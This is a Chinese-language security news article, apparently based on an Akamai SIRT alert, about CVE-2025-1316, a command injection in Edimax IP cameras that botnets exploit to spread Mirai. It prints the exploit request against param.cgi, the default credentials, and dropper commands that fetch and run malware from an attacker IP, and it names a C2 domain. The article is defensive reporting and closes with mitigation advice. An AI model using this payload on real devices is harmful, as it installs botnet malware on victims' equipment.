-
-
Edimax摄像头RCE漏洞被利用传播Mirai恶意软件
-
发表于: 1天前 571
-
在现代社会,**物联网*设备的普及为我们的生活带来了便利,但与此同时,它们也成为网络犯罪分子攻击的重点目标。最近,Akamai安全情报和响应团队(SIRT)发布的警报指出,Edimax物联网设备中存在一个严重的命令注入漏洞,该漏洞被多个僵尸网络利用以传播Mirai恶意软件**。此漏洞被标记为CVE-2025-1316,且已被证实是一个持续存在的危险,影响了一系列Edimax设备,使用户面临严重的安全风险。
Mirai恶意软件以其能够妥协物联网设备并发动分布式拒绝服务(DDoS)攻击而臭名昭著。CVE-2025-1316漏洞具体针对Edimax设备中的 /camera-cgi/admin/param.cgi
端点,攻击者可以利用此漏洞在 ipcamSource
参数的 NTP_serverName
选项中注入命令。若要成功利用此漏洞,攻击者通常会使用如 admin:1234
这样的默认凭据。尽管该漏洞特别提到Edimax的IC-7100网络摄像头,但它可能影响更广泛范围的Edimax设备。
Akamai SIRT最早在2024年10月的蜜罐中检测到针对该漏洞的活动,而理论上的利用代码早在2023年6月就已经存在。最早的攻击尝试发生在2024年5月,随着时间的推移,在2024年9月以及2025年1月至2月期间,这种活动达到了高峰。这些攻击主要由不同的僵尸网络进行,包括Mirai的变种。
为了向大家展示危害,以下是利用该漏洞的一个示例攻击代码。这段代码注入命令以在设备上执行一个shell脚本:
/camera-cgi/admin/param.cgi action=update&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0
这一脚本下载并执行一个不同架构的Mirai恶意软件变体,包括ARM、MIPS和x86。这一过程涉及几个命令的执行,确保恶意软件的顺利下载安装。例如,命令行中可能会包含:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://193.143.1[.]118/x86;
curl -O http://193.143.1[.]118/x86;
cat x86 > OSGt;
chmod +x *;
./OSGt joined;
rm -rf OSGt
相似的命令适用于其他架构。此次攻击中发现有两个不同的僵尸网络在利用此漏洞。第一个僵尸网络利用漏洞下载并执行一个名为 curl.sh
的脚本,通过 angela.spklove[.]com 的命令控制(C2)服务器与外部进行通信,该恶意软件在执行时会打印出“VagneRHere”的信息。第二个僵尸网络则下载并运行一个名为 wget.sh
的脚本,其中执行的 Mirai恶意软件 具有反调试功能,并在执行时打印出“Hello, World!”。
这两个僵尸网络都利用了多个已知的漏洞,包括Docker API漏洞和影响TOTOLINK设备的CVE-2024-7214。随着Mirai恶意软件的遗产继续影响物联网安全,及时了解相关威胁并采取有效的应对措施显得尤为重要。
为了保护自己免受这些威胁,用户应采取以下措施:首先,升级受影响的设备,将过时或易受攻击的设备替换为新型号;其次,确保所有设备使用强大且独特的密码,以防止简单的暴力破解攻击;同时,监控网络流量,以检测可疑活动,例如异常的流量模式;最后,实施安全措施,使用防火墙和入侵检测系统来阻止利用漏洞的尝试。
Mirai恶意软件的持续演变以及Edimax物联网设备遭到不断利用的事实,突显了与遗留固件相关的风险以及对用户隐私和安全的重大威胁。 网络安全并不是一项可以轻视的任务,保护自身设备和用户数据需要持续的努力和警惕。时代在发展,网络安全的威胁形式也在不断变化,这就要求我们与时俱进,随时准备应对新兴的网络攻击,以保护我们的数字资产不被侵害。在这个快速发展的技术环境中,只有建立强大的安全基础,才能确保我们在拥抱科技的同时,也能抵御潜在的网络氛围中滋生的威胁。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课